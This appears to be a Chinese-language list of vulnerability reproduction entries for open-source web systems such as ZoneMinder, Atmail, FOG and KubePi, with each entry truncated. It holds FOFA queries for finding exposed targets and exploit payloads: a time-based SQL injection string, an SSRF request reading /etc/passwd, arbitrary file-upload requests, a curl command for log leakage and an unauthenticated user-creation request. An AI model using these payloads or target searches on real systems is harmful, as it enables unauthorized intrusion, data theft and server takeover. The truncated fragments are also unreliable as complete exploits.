K37-1开源-微商城系统-SQL 漏洞描述: 微商城系统 goods.php 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 fof
K36-2开源-智能停车管理系统-SQL 漏洞描述: 停车场后台管理系统 GetPasswayData 存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务
K35-1开源-Webuserlogin-RCE fofa语法: FOFA语法:body=“/upload/images/raisecom/back.gif” && title==“Web user login” 漏洞复现: payload: GET /vpn/list_base_config.ph
K34-1开源-ZoneMinder-SQL 漏洞复现: payload: /zm/index.php?sort=**if(now()=sysdate()%2Csleep(6)%2C0)**&order=desc&limit=20&view=request&request=watch&mid=1
K32-2开源-短视频直播打赏系统-任意文件上传 漏洞复现: payload: POST /admin/ajax/upload HTTP/1.1 Host: Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqVHC
K32-1开源-短视频直播打赏系统-SSRF 漏洞复现: payload: GET /caiji/get_curl?url=file:///etc/passwd HTTP/1.1 Host: Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1
K31-1开源-Atmail-SQL 漏洞复现: payload: POST /index.php/admin/index/login HTTP/1.1 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttp
K30-1开源-IP网络广播服务平台-任意文件上传 漏洞复现: payload: POST /api/v2/remote-upgrade/upload HTTP/1.1 Host: Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Wind
K29-1开源-FOG-InformationLeakage 漏洞复现: payload: 获取hostname curl -i -s -k -X $'POST' --data-binary $'file=/var/log/fog/fogscheduler.log&ip=<BASE64_SERVER
K28-1KubePi–PermissionAC 漏洞复现: payload: POST /kubepi/api/v1/users HTTP/1.1 Host: Content-Length: 248 Accept: application/json, text/plain, */* lang: